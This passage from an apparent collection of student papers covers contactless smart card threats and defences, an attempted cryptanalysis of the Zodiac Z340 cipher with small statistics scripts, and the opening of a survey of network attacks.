Interruption of Operations. Another threat contactless smart cards face is the interruption of operations. Because the contactless smart card moves within the electromagnetic field, the data transmission between the reader and the card may be interrupted at any moment without the user's notice; the user may move his smart card out of the electromagnetic field without even realizing it. The system therefore needs to ensure that transactions complete successfully without any miscommunication of data. Reliable backup mechanisms need to be implemented, and back-dated data should be available whenever possible.

Denial of Service. This type of attack, common in computer networks, can also occur with contactless smart cards. It can be carried out by the owner of the card, or by attackers in close proximity. The former occurs when users, for some reason, want to redeem a new functional card from the issuer free of charge. The latter occurs when monetary units are debited from the card at close proximity, denying the user access to the service he has paid for. The information within a contactless smart card can even be deleted or destroyed completely using inappropriate electromagnetic waves.

Covert Transactions. The most important difference between contact and contactless smart cards lies in the fact that the user does not notice when a fake reader enters into communication with the card he is holding. The biggest threat to contactless technology is therefore covert transactions, in which fraudulent merchants communicate with the user's card, triggering fake transactions using fake readers. Such merchants could process a number of transactions each with a small amount, or even debit, from a distance, all the monetary units contained on the card. A sound approach to protecting against this attack strategy is strong mutual authentication between the card, the reader and the user, possibly relying on certificates and requiring some kind of user interaction. For example, a user could be prompted to push a button on his card, or to apply some similar mechanism, whenever a transaction is performed. In any case, the system must help the user accept only legitimate transactions.
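The mutual authentication recommended above is typically built from a symmetric challenge-response exchange. The sketch below (Python standard library only; the message layout is our own simplification, not any card standard) shows how both sides can prove knowledge of a shared key without ever transmitting it:

    import hmac, hashlib, secrets

    KEY = secrets.token_bytes(16)   # shared secret, personalized into the card

    def respond(challenge, key=KEY):
        # Prove knowledge of the key by MACing the fresh challenge.
        return hmac.new(key, challenge, hashlib.sha256).digest()

    # The reader authenticates the card ...
    reader_challenge = secrets.token_bytes(16)      # fresh nonce: no replays
    card_response = respond(reader_challenge)
    assert hmac.compare_digest(card_response, respond(reader_challenge))

    # ... and the card authenticates the reader with its own challenge.
    card_challenge = secrets.token_bytes(16)
    reader_response = respond(card_challenge)
    assert hmac.compare_digest(reader_response, respond(card_challenge))

A passive eavesdropper sees only nonces and MACs, and a fake reader that does not hold the key cannot produce a valid response, which addresses both the eavesdropping and covert-transaction threats described above.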
Other Types of Attacks. Beyond the above, there are physical attacks on the chip hardware, for example by micro-electronic probing, as well as so-called side-channel attacks, in which the opponent simply monitors the electrical activity of the chip and tries to turn seemingly unrelated power, timing or electromagnetic emanation measurements into meaningful information. New kinds of side-channel attacks against contactless technology have recently emerged, and they have proven quite successful in recovering secret information from the card with very limited resources when no specific countermeasures are implemented.

Security in 3DES. The 3DES algorithm is used to calculate Cryptographic Check Values (CCVs). The primary purpose of the CCV is to provide a data integrity function ensuring that the message has not been manipulated in any way; this covers the alteration, addition and deletion of data. The essential security of smart card data transmission can be achieved through sequence numbers incorporated within the CCV. The CCV also supplies some assurance of source authentication, depending on the key management architecture. However, the CCV does not provide the property of non-repudiation: it is almost impossible to prove to a third party that a message is authentic, because the receiver holds the same secret key as the sender and is therefore able to create a new message or modify an existing one [29].

Security in RSA. It is relatively easy to generate an apparently authentic copy of a digital signature when no evidence is present to prove the authenticity of the signing key. Source authenticity and non-repudiation cannot be checked if the authenticity of the keys cannot be proven; there is therefore a need for additional steps to assure the authenticity of the sender's public key [30].

5 Related Work: Future of Smart Cards

5.1 More Extensive Use of Smart Cards in Various Industries and Practices

Smart cards have now become integrated into our daily lives, as we rely heavily on the technology to pay our transport fares, enter our offices, access our computers at work and even get a snack from the vending machine. Consumer research has revealed that nearly 80 percent of consumers surveyed believe that smart cards will be an important part of their everyday life, and more than three-quarters are strongly attracted to smart cards able to consolidate payment functions and store personal data on the same card. Smart cards also have the potential to become lifestyle cards, holding a range of applications chosen by the cardholder [31].

Most of the smart card systems in use today each serve only a single purpose, related to just one process or hardwired to only one application. A smart card cannot easily justify its existence in this respect, and the future approach is therefore to design multi-application cards with an operating system based on an open standard that can perform a variety of functions [32].

At the Personal Level. At the personal level, in the near future we foresee smart cards being configurable and able to handle multiple tasks selected by their owners: providing access to company networks, enabling electronic commerce, storing personal health records, providing ticketless airline travel and car rentals, and offering electronic identification for accessing government services, just to name a few [33].
The ultimate goal would be to carry fewer cards while gaining greater convenience and faster access to a wide array of information.

At the Corporate Level. At the corporate level there also exists a growing trend in the adoption of smart card and card reader systems by companies across various industries. For instance, hospitals utilize smart card technology to ensure more timely and secure dispensing of medicine to patients. A medicine cabinet is fitted with reader technology and wirelessly connected to software that links to personal dosage information stored on an RFID wristband. Hence, if a patient is required to take one tablet at six o'clock in the morning, the software communicates with the cabinet to indicate that the patient needs to access their medicine. The patient then presents his wristband to the cabinet reader, gaining access to the prescribed medication at the correct time [34].

Smart card technology is also getting attention from the fleet management sector, where RFID is already being installed in rental cars. The idea is that a rental car could be parked on a street corner and accessed simply by presenting an RFID-enabled card to a reader installed within the windscreen. HID Global, a leader in providing access control and secure identity solutions, including secure card issuance and RFID technology, is working with some major car rental companies interested in leveraging the benefits of this technology to streamline the management of their fleets [35].

5.2 Possibility of Replacement by NFC-Enabled Smart Phone Devices

With a wide and growing number of industries finding uses for smart cards in their operations, coupled with the increasing popularity and adoption of smart phones, there lies a huge possibility of integrating smart card functionality into smart phones. This would fulfil the requirements of a multi-function smart card while removing the need for another physical card containing a microprocessor chip. At least in the local context, such a scenario may soon become reality: from the middle of 2012, consumers here will be allowed to tap and pay for their purchases at more than 20,000 retail points and in taxis using Near Field Communication (NFC) technology on a smart phone.

NFC is a short-range wireless communication technology capable of bidirectional data transfer, which allows mobile phones and NFC readers to communicate and conclude transactions within a 4 cm distance, operating in the HF frequency band at 13.56 MHz [36]. At its launch in 2012, the deployment focus of NFC technology will be on retail payment, but it will be extended to loyalty schemes, ticketing and gift vouchers within two years. Discussions will be held with the Land Transport Authority to plan the rollout of NFC mobile payment for transit in early 2013 [37]. Merchants need not install new devices to accept mobile payment from NFC phones: those that currently accept contactless payment cards from MasterCard, Visa or CEPAS will be able to use the same device to accept such payments [38]. This has already been done in certain parts of Europe and Asia, such as South Korea and Japan.

6 Conclusion

The use of smart cards has provided convenience and ease of use to different individuals and entities. But as discussed in this paper, there are several security concerns and potential threats which users and developers have to be aware of.
Developers have to guard smart card systems against attacks and potential threats from hackers. The security measures include cryptographic algorithms, digital signatures and key management, which together provide authentication, data integrity, confidentiality and non-repudiation.

In the case of contact smart card technology, card authentication, cardholder verification and transaction authorization are of utmost importance, as these are the areas hackers are most likely to attack. Measures such as Static Data Authentication, Dynamic Data Authentication and Combined DDA with Application Cryptogram Generation are used for card authentication, while password-related mechanisms such as PINs and signatures are required for cardholder verification. Lastly, for transaction authorization, authorization request and response cryptograms are implemented to ensure that transactions are genuine and successful.

Due to the lack of a physical medium in contactless smart card technology, security in the process of information transmission is critical for protecting the user. The contactless channel creates opportunities for threats such as eavesdropping, denial of service and covert transactions. Developers have the responsibility of preventing these attacks with the various security mechanisms described previously.

With the pervasive use of smart cards in many aspects of our lives, smart cards have become a necessity that provides us with great convenience. We foresee smart cards becoming configurable and able to handle multiple tasks selected by their users. Many industries and companies have brought the use of smart cards to brand-new levels, including incorporating them into medicine dispensers and rental car access. Lastly, there lies a new possibility of integrating smart card functionality into smart phones using Near Field Communication, the motivation being that a single smart phone can replicate the capabilities of numerous smart cards. This upcoming technology could therefore pose a huge threat to smart cards, and brings with it future studies into other security principles, techniques and issues to do with NFC.

References
1. Smart card: Invented here, http://www.nytimes.com/2005/08/09/world/europe/09ihtcard.html
2. Durability of Smart Cards for Government eID, http://www.datacard.com/downloads/ViewDownLoad.dyn?elementId=repositories/downloads/xml/govt_wp_smartcard_durability.xml&repositoryName=downloads&index=8
3. Smart Card Alliance. EMV: Frequently Asked Questions, http://www.smartcardalliance.org/pages/publications-emv-faq#q15
4. Smart Card Alliance. EMV: Facts at a Glance, http://www.smartcardalliance.org/resources/pdf/EMV_Facts_081111.pdf
5. Chip and PIN, http://www.smartcard.co.uk/Chip%20and%20PIN%20Security.pdf
6. VISA. Chip Terms Explained. A Guide to Smart Card Terminology, http://www.visaasia.com/ap/center/merchants/productstech/includes/uploads/CTENov02.pdf
7. Cotignac. Blog. EMV Offline Data Authentication, http://cotignac.co.nz/blogs/11December2008.html
8. e-EMV: Emulating EMV for Internet payments using Trusted Computing technology, http://digirep.rhul.ac.uk/file/03ef906a-ba3d-6978-8202-864e1a5f9942/1/RHUL-MA-200610.pdf
9. VISA. General PED Frequently Asked Questions, http://www.secureretailpayments.com/resources/visa-ped-faq.pdf
10. VISA. General PED Frequently Asked Questions, http://www.secureretailpayments.com/resources/visa-ped-faq.pdf
11. EMV (Chip and PIN) Project, http://www.scribd.com/doc/50776161/27/Cardholder-Verification-Methods
12. EMV (Chip and PIN) Project, http://www.scribd.com/doc/50776161/27/Cardholder-Verification-Methods
13. EMV Contactless Communication Protocol. News, Cards Tech & Security, http://www.ects.net/en/article.asp?/41.html
14. Strong Encryption Package, Triple DES Encryption, http://www.tropsoft.com/strongenc/des3.htm
15. Advanced Encryption Standard (AES), http://www.vocal.com/cryptography/aes.html
16. KEY-BASED ENCRYPTION: Rivest Shamir Adleman (RSA), http://library.thinkquest.org/27158/concept2_4.html
17. Elliptic Curve Cryptography. An Implementation Tutorial, http://www.reverseengineering.info/Cryptography/AN1.5.07.pdf
18. How thieves bypass bank card Pins, http://www.thisismoney.co.uk/money/saving/article-1614798/How-thieves-bypass-bank-card-Pins.html
19. Chip and Spin, http://www.chipandspin.co.uk/spin.pdf
20. 3-D Secure: A critical review of 3-D Secure and its effectiveness in preventing card not present fraud, http://www.58bits.com/thesis/3-D_Secure.html#_Toc290908599
21. Defending against wedge attacks in Chip & PIN, http://www.lightbluetouchpaper.org/2009/08/25/defending-against-wedge-attacks/
22. EMV PIN verification "wedge" vulnerability, http://www.cl.cam.ac.uk/research/security/banking/nopin/
23. Defending against wedge attacks in Chip & PIN, http://www.lightbluetouchpaper.org/2009/08/25/defending-against-wedge-attacks/
24. EMV (Chip and PIN) Project, http://www.scribd.com/doc/50776161/27/Cardholder-Verification-Methods
25. 63% of Consumers Prefer Credit Card Verification by Fingerprint over PIN, Signature or Photo, http://www.banktech.com/architecture-infrastructure/227900120
26. Chip and Spin! Examining the technology behind the "Chip and PIN" initiative, http://www.chipandspin.co.uk/problems.html
27. Chip & PIN (EMV) Relay Attacks, http://www.cl.cam.ac.uk/research/security/banking/relay/
28. Contactless Technology Security Issues, http://www.chipublishing.com/samples/ISB0903HH.pdf
29. Cryptography and Key Management, http://www.smartcard.co.uk/tutorials/sct-itsc.pdf
30. Cryptography and Key Management, http://www.smartcard.co.uk/tutorials/sct-itsc.pdf
31. My Money Skills. Is there a Smart Card in Your Future? http://www.mymoneyskills.pk/english/cd/uc/future.jsp
32. Smart Card Technology: Past, Present, and Future, http://www.journal.au.edu/ijcim/2004/jan04/jicimvol12n1_article2.pdf
33. Smart Card Technology: Past, Present, and Future, http://www.journal.au.edu/ijcim/2004/jan04/jicimvol12n1_article2.pdf
34. The Future of Smart Card Technology is Here Today or Is It? http://www.hidglobal.com/main/blog/2010/04/the-future-of-smart-card-technology-is-here-today-or-is-it.html
35. The Future of Smart Card Technology is Here Today or Is It? http://www.hidglobal.com/main/blog/2010/04/the-future-of-smart-card-technology-is-here-today-or-is-it.html
36. Performing Relay Attacks on ISO 14443 Contactless Smart Cards using NFC Mobile Equipment, http://www.sec.in.tum.de/assets/studentwork/finished/Weiss2010.pdf
37. Buy Things with Mobile Phones? This May be Reality from Mid-2012, http://www.todayonline.com/Singapore/EDC111026-0000201/Buy-things-with-mobile-phones?-This-may-be-reality-from-mid-2012
38. TODAYonline | Singapore | Consortium to bring NFC shopping to Singapore by 2012, http://www.todayonline.com/Singapore/EDC111025-0000502/Consortium-to-bring-NFC-shopping-to-Singapore-by-2012

Analysis of Zodiac-340 Cipher

Yuanyi Zhou, Beibei Tian, Qidan Cai
National University of Singapore, Information Systems, Computing 1, 13 Computing Drive, Singapore 117417

Abstract. With the ubiquity of personal computers and software, complex arithmetic calculations have become possible in areas such as crime solving, military analysis and medical research, because a computer can run through a large number of possible combinations much faster than a human brain can. However, many encryption methods are designed in ways that require an obscene amount of time to be broken. Even with the help of computers, some problems remain unsolved due to their complexity; one of them is the Zodiac Z340 [1]. The main purpose of our project is to decrypt the Zodiac-340 cipher.

1 Introduction

The serial killer Zodiac, who terrorized Northern California in the late 1960s, sent four ciphers to the local press. These ciphers were claimed to be the trace of his crimes, but only one of the four has been successfully decoded, keeping the identity of the killer unknown. Nevertheless, a sketch (Figure 1) of the Zodiac killer was drawn based on witness testimonies [2]. Although the killer may have passed away already, the effort to solve his ciphers is still ongoing.

Figure 1.

2 Background

The objective of our research is to reduce the number of methods that could have been used to encrypt the message. The first cipher to be decoded is called Z408. Among the remaining three, Z340 is the one commonly attempted, while the other two have hardly been attempted because of the brevity of their messages. One is Z13, which is believed to reveal the name of the killer; the other is Z32, sent because the killer was upset that no one followed his wishes to wear the buttons.

2.1 Findings from Z408

Z408 was encrypted as a homophonic substitution cipher. The plaintext (with the killer's own misspellings preserved) is:

"I like killing people because it is so much fun It is more fun than killing wild game in the forrest because man is the most dangerous anamal of all To kill something gives me the most thrilling experence It is even better than getting your rocks off with a girl The best part of it is that when I die I will be reborn in paradice and all the I have killed will become my slaves I will not give you my name because you will try to slow down or stop my collecting of slaves for my afterlife."

Figure 2. Z408 part 1, sent to Vallejo Times-Herald on July 31, 1969, decoded on August 8, 1969

Figure 3. Z408 part 2, sent to San Francisco Chronicle on July 31, 1969, decoded on August 8, 1969

Figure 3. Z408 part 3, sent to San Francisco Examiner on July 31, 1969, decoded on August 8, 1969

2.2 Z340

Many conventional methods have been tried, including one-time pad, double columnar transposition, polyalphabetic substitution, and homophonic substitution. However, none of them has produced a result. Some creative ideas have also been proposed, such as Mr. Farmer's Japanese "帝 (Mikado)" theory, but none of them has been verified [3].

Figure 4. Z340, sent to the San Francisco Chronicle on November 8, 1969

2.3 Z13

Z13 is considered to be the killer's attempt to disclose his name.

Figure 5. Z13, sent to the San Francisco Chronicle on April 20, 1970
2.4 Z32

The last cipher was sent after the killer found that no one was following his instruction to wear the special buttons, which made him upset and led him to decide to pursue a further murder.

Figure 6. Z32, sent to the San Francisco Chronicle on June 26, 1970

3. Prior Possible Decryption Methods

3.1 The Z340 Seems to Be a Completely Meaningless Message

We first thought that Z340 might actually be a completely meaningless message. But after analyzing the whole case, we found that Zodiac seemed to be very proud of his killings and of not being caught by the police, and he continued to encrypt his identity into the letters to challenge the whole world. Thus we drew the conclusion that Z340 is genuine and contains some important information about the killer's identity.

3.2 Web-Based Dump Analysis

Code-breakers have attempted to solve the Z340 for the past forty years without success. During these forty years, code-breakers have investigated the Z340 from multiple perspectives: (1) as a homophonic cipher similar to the Z408; (2) as a polyalphabetic cipher, an improvement on the Z408 encryption method; (3) as a double columnar transposition, another improvement on the Z408 encryption method; and (4) as a one-time pad, an unbreakable encryption method when used properly. All of these approaches have failed to deliver any meaningful conclusion over the 40 years. Our group therefore concludes that, given the similarity of Z408 and Z340, Zodiac may have used the same method for Z340 as for Z408, namely homophonic substitution; but given the failed attempts over such a long time, he may have used an improved variant of the Z408 encryption method.

4. Analyzing the 340-Cipher: What We Did

Our group came up with and attempted the following ways of interpreting the 340-cipher: (1) use the partial-break method to find the identification number of the Zodiac killer in the cipher; (2) the Holy Bible method; (3) analyzing the special features of the 340-cipher; (4) reading the 340-cipher along the Zodiac signature, segmented into 12 equal 30-degree slices.

4.1 Partial-Break Method

As the Zodiac killer claimed, the cipher contains his identity. We therefore guessed that the cipher should contain an identification number of the Zodiac killer; that is the reason we came up with the first method. We did some research on the format of identification numbers of Americans in the 1960s and found that the identification number, known as the Social Security Number (SSN), contains nine digits [4].

Before we continue, we should first introduce a website. While searching for information on the Zodiac ciphers, we found a quite useful website, http://oranchak.com/zodiac/webtoy/, which we will refer to as the "zodiac tool" in this report. Using this zodiac tool, we can replace any of the 62 Zodiac symbols with a chosen English character. What we did was replace every symbol with a frequency lower than 2% (not including 'A') with "A", and we then tried to find a string containing at least nine consecutive "A"s. Symbols with higher frequencies have a lower probability of being digits, which is why we tried the low-frequency symbols. In the end, the longest string we obtained contained five consecutive "A"s, as shown in Figure 7. This suggests that the Z340 probably does not contain an SSN, and this method does not break the Z340.

Figure 7. The result we get using the zodiac tool
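The search for a long run of suspected digit symbols is easy to automate. The sketch below (plain Python; the example symbol stream is made up, not the real Z340 transcription) marks every symbol whose relative frequency falls below a threshold and reports the longest run of consecutive marked positions:

    from collections import Counter

    def longest_low_freq_run(symbols, threshold):
        # Mark every symbol rarer than the threshold, then scan for the
        # longest stretch of consecutive marked positions.
        freq = Counter(symbols)
        n = len(symbols)
        best = run = 0
        for s in symbols:
            run = run + 1 if freq[s] / n < threshold else 0
            best = max(best, run)
        return best

    # Hypothetical symbol stream; a run of nine or more rare symbols
    # would be consistent with an embedded SSN.
    stream = list("ABACDQWXYZQWXYZAABB" * 5)
    print(longest_low_freq_run(stream, 0.06))   # -> 2 for this made-up stream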
4.2 Holy Bible Method

We noticed in the Z408 plaintext the sentence "when I die I will be reborn in paradice", which likely indicates that the killer had a belief in God, or at least in the resurrection of the body and the life everlasting, horrible as his deeds were. As a killer, he might have considered himself a "Moses" who could kill people according to the "words" from God. The "words" might be what he read from the Holy Bible and chose to show the public that he was following God's commands. This religious link made us think hard about how the killer might have encrypted the message. We saw two possible ways: (1) the cipher contains the names of books, chapters and verses; (2) only certain symbols are useful in giving a meaningful result.

The first way would take a long time to attempt, because we are not familiar with all the books of the Holy Bible; with our limited time, we chose to try the second one. We mention the first possibility in this report to help people with a better understanding of the Holy Bible to decrypt the cipher.

For the second way, we used the zodiac tool to examine the symbols. According to the zodiac tool, one symbol has the highest frequency, which suggests that its occurrences probably carry the useful information. When we replaced that symbol with "J", we obtained a map of "J" strings.

Figure 8.

The "J"s appeared randomly placed, but their positions were readable. We took the position of each "J" to indicate a book and a chapter. For example, the top-left "J" has position (1, 2), which would indicate book 1, chapter 2, i.e. Genesis chapter 2 [5], verse 1: "Thus the heavens and the earth, and all the host of them, were finished." The second "J", at position (2, 5), indicates book 2, chapter 5, i.e. Exodus chapter 5, verse 1: "Afterward Moses and Aaron went in and told Pharaoh, 'Thus says the LORD God of Israel: Let my people go, that they may hold a feast to Me in the wilderness.'"

Under this reading, we believe the Z340 contains only religious information from the killer, chosen by him to "educate" his "slaves"; it would therefore not reveal the killer's identity. However, this is just one of the approaches to the cipher, and it cannot be verified.

4.3 Analyzing the Special Features and the IC

Let us take a closer look at the 340-cipher. We examine the symbol density map, the row repeat map, the column repeat map, and the first occurrences of symbols.

Figure 9: Symbol density map
Figure 10: Row repeat map
Figure 11: Column repeat map
Figure 12: Highlight of first occurrences of symbols

The following are the index of coincidence (IoC), entropy and Chi² statistics:

IoC: 0.0194. By row: 0 · 0 · 0 · 0.029 · 0.007 · 0.007 · 0 · 0.007 · 0.007 · 0.015 · 0 · 0 · 0 · 0.015 · 0 · 0.007 · 0.015 · 0.022 · 0.007 · 0 (average: 0.007). By column: 0.005 · 0.026 · 0.026 · 0.016 · 0.011 · 0.042 · 0.011 · 0.011 · 0.021 · 0.021 · 0.032 · 0.016 · 0.021 · 0.026 · 0.011 · 0.016 · 0.021 (average: 0.017). Ratio to the IoC of random letters: 0.5468.

Entropy: 5.7453. By row: 0.491 · 0.491 · 0.491 · 0.471 · 0.485 · 0.485 · 0.491 · 0.485 · 0.485 · 0.479 · 0.491 · 0.491 · 0.491 · 0.479 · 0.491 · 0.485 · 0.479 · 0.473 · 0.485 · 0.491 (average: 0.485). By column: 0.571 · 0.548 · 0.551 · 0.563 · 0.565 · 0.537 · 0.565 · 0.565 · 0.553 · 0.553 · 0.545 · 0.559 · 0.553 · 0.551 · 0.565 · 0.559 · 0.557 (average: 0.556).

Chi²: 0.4039. By row: 15.248 · 15.248 · 15.248 · 12.541 · 14.345 · 14.345 · 15.248 · 14.345 · 14.345 · 13.443 · 15.248 · 15.248 · 15.248 · 13.443 · 15.248 · 14.345 · 13.443 · 12.54 · 14.345 · 15.248 (average: 14.436). By column: 16.72 · 13.177 · 14.063 · 15.835 · 15.834 · 12.292 · 15.834 · 15.834 · 14.063 · 14.063 · 13.177 · 14.949 · 14.063 · 14.063 · 15.834 · 14.949 · 14.949 (average: 14.688).
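For reference, the index of coincidence quoted above is computed as IC = Σ f_i(f_i − 1) / (N(N − 1)) over the symbol frequencies f_i. A minimal sketch (plain Python; the short example string is ours, not the cipher itself):

    from collections import Counter

    def index_of_coincidence(text):
        # IC = sum of f*(f-1) over all symbols, divided by N*(N-1).
        n = len(text)
        if n < 2:
            return 0.0
        return sum(f * (f - 1) for f in Counter(text).values()) / (n * (n - 1))

    # English-like text scores near 0.066; uniform random letters near 0.038.
    # The Z340's 0.0194 is low because its 60+ homophones flatten the counts.
    print(index_of_coincidence("DEFENDTHEEASTWALLOFTHECASTLE"))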
Figure 13.

There are two repeated trigrams in the 340-cipher (their symbol glyphs are not reproducible in this transcription), both of which appear twice. A handful of digrams each appear three times, with some seven other digrams repeated twice. The '+' symbol is the most frequently occurring symbol, with 24 occurrences in all; it far exceeds all other symbols in frequency. The average number of characters between each repetition of a symbol is 76.4, and the average number of repeated symbols per line is 0.9.

Comparing the first cipher with the 340-cipher offers some interesting facts. They are both the same width of 17 columns. Computing the index of coincidence for both the 340-cipher and the first cipher gives an answer of 0.02 for both, which suggests that they are very similar in design. The difference in the number of characters is interesting, as the 340-cipher has a larger cipher alphabet in fewer characters. This suggests that, if the homophonic format was maintained, the alphabet was expanded to provide greater security.

To examine some specifics, we looked at the two repeated trigrams. All of their symbols have a higher-than-average number of occurrences (10 to 12); in fact, 'F' is the most frequently occurring symbol after '+'. This would indicate that their plaintext counterparts appear less frequently in English, assuming that the 340-cipher is still some type of homophonic cipher. The lower-frequency letters in English, starting from the bottom, are Z, J, X, Q, K, V, G, B, Y, W, M, F, P, U, ...; to match these, it would be useful to recognize a trigram drawn from these lesser-used letters.

Examining the behavior of the symbol 'F': it is followed by the symbol 'B' three times, but preceded by 'B' once. It is also both followed and preceded, one time each, by the symbol 'backwards K'. Since 'F' is both followed and preceded by 'B', let us examine the behavior of 'B'. It too is both followed and preceded by another symbol, 'backwards Y'. This 'backwards Y' appears only five times in the text, suggesting that it might stand for a very high-frequency letter. So these two symbols are each both followed and preceded by two other symbols. This rules out 'q', which in English is always followed by the same letter, 'u' (assuming no intentional misspelling).

We tried numerous combinations of replacements in the cipher, and each seemed to hold some promise, but none proved sound upon further investigation. One point that we believe deserves further investigation is the phenomenon noted earlier in the first cipher, and its possible meaning for the second cipher. We noted that the letter 'A' had been encrypted using two symbols that also encrypted 'S', and that one encryption of 'A' is the letter 'S' itself. Our reasoning on this point is that, rather than being a mistake, this may have been a deliberate double encryption: the 'A' was encrypted as 'S', and the 'S' was then encrypted again into the two triangles. Note also that one of those symbols is the triangle with a dot in the middle, which has a role to play in the fantastical analysis. We assert that perhaps there are multiple levels of encryption in the second cipher.
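Repeated digram and trigram counts like those above can be produced mechanically. A small sketch (plain Python; the input string merely stands in for the symbol transcription, which we do not reproduce):

    from collections import Counter

    def repeated_ngrams(symbols, n):
        # Slide a window of width n and keep the n-grams occurring twice or more.
        grams = Counter(tuple(symbols[i:i + n]) for i in range(len(symbols) - n + 1))
        return {g: c for g, c in grams.items() if c >= 2}

    text = "HERXFBQFBNVFBXHER"        # stand-in symbol stream
    print(repeated_ngrams(text, 2))   # repeated digrams, e.g. ('F','B'): 3
    print(repeated_ngrams(text, 3))   # repeated trigrams, e.g. ('H','E','R'): 2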
4.4 Second Attempt: the Zodiac Signature

The three methods above were our first attempts at solving the Z340. As none of them worked, we decided to do more research on how the Z408 was cracked. The Z408, sent on August 1st, 1969, was encrypted as a homophonic substitution cipher. One week later, on August 8th, 1969, Donald and Bettye Harden, residents of Salinas, California, successfully decrypted the cipher. The Hardens' method was based on their deduction that the message would contain the words "kill" and "I" [6].

We think that the Z340 is also encrypted with a homophonic method, as do many of the code-breakers trying to solve the cipher. However, the Z408 was decrypted in one week, so if the Z340 were encrypted in exactly the same way as the Z408, it should not have remained a mystery for more than 40 years. Besides, because the Z340 was sent three months after the Z408 was broken, the Zodiac killer would have had time to come up with further tricks to make the Z340 even harder to break. Based on the above analysis, we conclude that the Z340 is still encrypted homophonically, but with an improved and even harder method.

When we read an article about how its author thought the Z340 should be solved, we were inspired: maybe the Zodiac killer changed the order of the characters, and we should read the Z340 along the Zodiac signature. That is, we should read the cipher in a circle instead of from left to right and top to bottom. Figure 15 shows the idea more clearly.

Figure 14. The Zodiac signature

Figure 15. The way we read the cipher

Each of us tried to break the Z340 based on this idea; however, none of us obtained any useful information. There is a lot of work involved, as we would have to use brute force over the possible reading orders. Because of the time limit and lack of manpower, we eventually gave up on breaking the Z340 this way.

5. Related Work

A lot of work has been done on the cipher Z340, and we value one website highly: the zodiac tool already introduced in Section 4.1, http://oranchak.com/zodiac/webtoy/. We discuss three aspects of this website: its purpose, the functions it can perform, and the results that have been obtained with it.

The purpose: the website helps code-breakers attack the cipher Z340 using the simple monoalphabetic homophonic substitution method. The zodiac tool's developer believes that Z340 is encrypted by homophonic substitution because Z408 was broken using this method.

Functions: Figure 16 shows how the website looks; it mainly contains seven parts. With these, we can change any symbol to any English letter (done in parts 1 and 2) and automatically get the corresponding letter frequencies (shown in part 6) after the changes are made. Besides, we get the decoded ciphertext automatically, making the ciphertext more readable (as shown in part 4). The website can even find words (also shown in part 4), which makes it easier to see whether we have obtained useful results.

Results: even with the help of this tool, nobody has yet broken the Z340. However, with some substitutions, one can obtain words like halloween, killing, you, next, die, zodiac.

Figure 16. The website: zodiac tool
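Re-reading the grid along a different path, as in Figure 15, is easy to experiment with programmatically. The sketch below reads a rectangular grid in an inward clockwise spiral; this is only one plausible interpretation of "reading in a circle", chosen by us for illustration:

    def spiral_read(grid):
        # Read a rectangular grid of symbols in an inward clockwise spiral:
        # top row, right column, bottom row (reversed), left column (reversed).
        out = []
        top, bottom = 0, len(grid) - 1
        left, right = 0, len(grid[0]) - 1
        while top <= bottom and left <= right:
            out.extend(grid[top][left:right + 1]); top += 1
            out.extend(grid[r][right] for r in range(top, bottom + 1)); right -= 1
            if top <= bottom:
                out.extend(grid[bottom][left:right + 1][::-1]); bottom -= 1
            if left <= right:
                out.extend(grid[r][left] for r in range(bottom, top - 1, -1)); left += 1
        return "".join(out)

    # Toy 3x4 grid; a real attempt would use the 20x17 Z340 symbol grid.
    grid = ["ABCD",
            "EFGH",
            "IJKL"]
    print(spiral_read(grid))   # ABCDHLKJIEFG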
6. Summary

To break the cipher Z340, we used four main methods: the partial-break method, looking for the identification number of the Zodiac killer in the cipher; finding clues from the Bible; reading the cipher along the Zodiac signature; and analyzing the special features and the IC of the 340-cipher. However, none of these four methods managed to break the cipher Z340. The cipher Z408 was broken in only one week; why has the cipher Z340 remained a mystery for more than 40 years? Is it just because the Zodiac killer increased the number of symbols, or did he improve his encryption method? It seems that advanced technology has not helped much in breaking this cipher. Maybe we will come up with a strange idea during a tea break, and it will turn out to be just the answer!

References
1. Voigt, T. (November 4, 2007). Zodiac Letters. Retrieved October 10, 2011 from http://www.ZodiacKiller.com/Letters.html
2. Wikipedia, The Free Encyclopedia. (October 5, 2011). Zodiac Killer. Retrieved October 10, 2011 from http://en.wikipedia.org/wiki/Zodiac_Killer
3. Farmer, C. (2007). The Zodiac 340 Cipher Solved. Retrieved October 10, 2011 from http://www.opordanalytical.com/articles1/zodiac-340.htm
4. Wikipedia, The Free Encyclopedia. (October 6, 2011). Social Security Number. Retrieved October 10, 2011 from http://en.wikipedia.org/wiki/Social_Security_number
5. Holy Bible (New King James Version, 1982). Thomas Nelson, Inc.
6. Thang, D. (December 2007). Analysis of the Zodiac Z340. A Project Report Presented to the Faculty of the Department of Computer Science, San Jose State University. Page 17.

The sampler of network attacks

Guang Yi Ho, Sze Ling Madelene Ng, Nur Bte Adam Ahmad, and Siti Najihah Binte Jalaludin
School of Computing, National University of Singapore, Computing 1, 13 Computing Drive, Singapore 117417, Republic of Singapore
{u0907064, u0907056, u0807104, u0907055}@nus.edu.sg

Abstract. Attacks over the years have become both increasingly numerous and sophisticated. Computer and network systems fall prey to many attacks of different forms. To reduce the risks associated with such attacks, it is imperative that organizations and individuals understand and assess them, and make prudent decisions regarding the defenses to put in place. Understanding the characteristics of network attacks allows better decisions to be made in selecting the appropriate barriers. To develop this understanding, we have chosen to classify four network attacks in a comprehensive manner, namely distributed denial of service, man-in-the-middle, spoofing and keylogger attacks. This paper focuses on providing a categorization of the above network attacks, thus offering a greater comprehension of the attacks along different dimensions. In addition, the paper explores the case of the recent attack on Sony, in relation to these network attacks.

1. Introduction

The evolution of technology has allowed most organizations to conduct their operations over the Internet, regardless of their geographic location. However, the power of the Internet has also led to an increase in system attacks over the years. As seen in Fig. 1 (refer to Appendix A: System Attacks Frequency), most organizations are susceptible to system attacks. In addition to viruses, worms and Trojans, the next top three attacks that organizations face are malware, botnets and web-based attacks. We discuss these attacks in depth later in this report.
Besides that, the motivation of attackers has also evolved over the years. Ten years ago it was mainly curiosity about how systems work; over the years, attackers have become more aggressive, and their motivations lean increasingly towards financial gain. In this report, four different types of system attacks will be discussed: distributed denial of service, man-in-the-middle, spoofing and keylogger attacks. For each attack we present its history, the motivations behind it, and how it is carried out. Thereafter, we classify the network attacks according to different factors, followed by a discussion of a case study on the Sony attacks. The terms "attacker", "intruder" and "hacker" are used interchangeably throughout this report.

2. Our Approach

